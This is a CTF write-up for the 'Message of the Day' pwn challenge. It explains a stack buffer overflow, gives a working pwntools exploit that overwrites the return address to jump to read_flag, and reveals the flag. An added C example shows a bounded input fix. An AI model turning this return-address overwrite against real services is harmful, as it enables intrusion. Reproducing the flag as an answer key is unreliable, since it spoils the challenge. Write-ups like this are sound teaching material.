ctftime

My solutions for various CTF challenges


MESSAGE OF THE DAY

pwn

From the OffHub router, you jump onto the Google-Haus smart hub. This fully featured assistant of the future that uses machine learning on the blockchain to control all our IoT devices promises it all. It delivers the ability to print a Message-of-the-day. The rest is available as a premium subscription service paid monthly.

$ nc motd.ctfcompetition.com 1337

cf6c6160966eae95b4313f05ad33b9794d2817b06766a5261d952990ad27a6a6

The binary lets you get and set a user MOTD and an admin MOTD, but you are not allowed to read the admin MOTD unless you are root. On inspection, the function calls a function named read_flag, so we just have to jump there.

Set a new user MOTD with option 2, overflow the buffer, and take control of RIP to jump to the read_flag function, which prints out the flag.

Exploit script:

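from pwn import *

# Load the binary to resolve the address of read_flag
e = ELF('motd')

# p = process('motd')
p = remote('motd.ctfcompetition.com', 1337)

# Select option 2 (set user MOTD)
p.recvuntil(b': ')
p.sendline(b'2')
p.recvuntil(b': ')
# 264 bytes of padding reach the saved return address, then read_flag's address
p.sendline(b'A' * 264 + p64(e.symbols['read_flag']))

print(p.recvall().decode())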

flag: CTF{m07d_1s_r3t_2_r34d_fl4g}
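
The overflow described above comes from an unbounded read into a fixed-size stack buffer. As an added example (not the challenge's source and not the author's code), here is a bounded set-MOTD routine in C; the 256-byte buffer size, the `scanf` pattern shown in the comment, and the names `set_motd` and `try_input` are assumptions.

```c
#include <stdio.h>
#include <string.h>

#define MOTD_CAP 256 /* assumed size; the page gives only the 264-byte offset */

/* Vulnerable pattern, for contrast (assumed, not the challenge's source):
 *     char motd[MOTD_CAP];
 *     scanf("%s", motd);   // unbounded: byte 265 onward lands on the return address */

/* Bounded setter: writes at most cap bytes to dst and rejects over-long lines.
 * Returns 0 on success, -1 on EOF or bad cap, -2 if the line did not fit. */
int set_motd(FILE *in, char *dst, size_t cap)
{
    char tmp[MOTD_CAP];
    if (cap == 0 || cap > sizeof tmp) return -1;
    if (fgets(tmp, (int)cap, in) == NULL) return -1;
    size_t len = strlen(tmp);
    if (len > 0 && tmp[len - 1] == '\n') {
        tmp[--len] = '\0';
    } else {
        /* No newline seen: drain the rest so it is not read as the next menu choice. */
        int c, extra = 0;
        while ((c = getc(in)) != EOF && c != '\n') extra = 1;
        if (extra) return -2;
    }
    memcpy(dst, tmp, len + 1); /* dst changes only after validation */
    return 0;
}

/* Constructed harness: feed n 'A' bytes plus newline, with a guard word placed
 * after the buffer. Returns set_motd's status, or 1 if the guard changed. */
int try_input(size_t n)
{
    struct { char motd[MOTD_CAP]; unsigned long guard; } f = { "", 0xC0FFEEUL };
    FILE *in = tmpfile();
    if (in == NULL) return -1;
    for (size_t i = 0; i < n; i++) putc('A', in);
    putc('\n', in);
    rewind(in);
    int rc = set_motd(in, f.motd, sizeof f.motd);
    fclose(in);
    return f.guard != 0xC0FFEEUL ? 1 : rc;
}

int main(void)
{
    printf("10: %d, 255: %d, 272: %d\n", try_input(10), try_input(255), try_input(272));
    return 0;
}
```

Input of the same length as the payload above (264 + 8 bytes) is rejected with -2 and the guard word after the buffer stays intact.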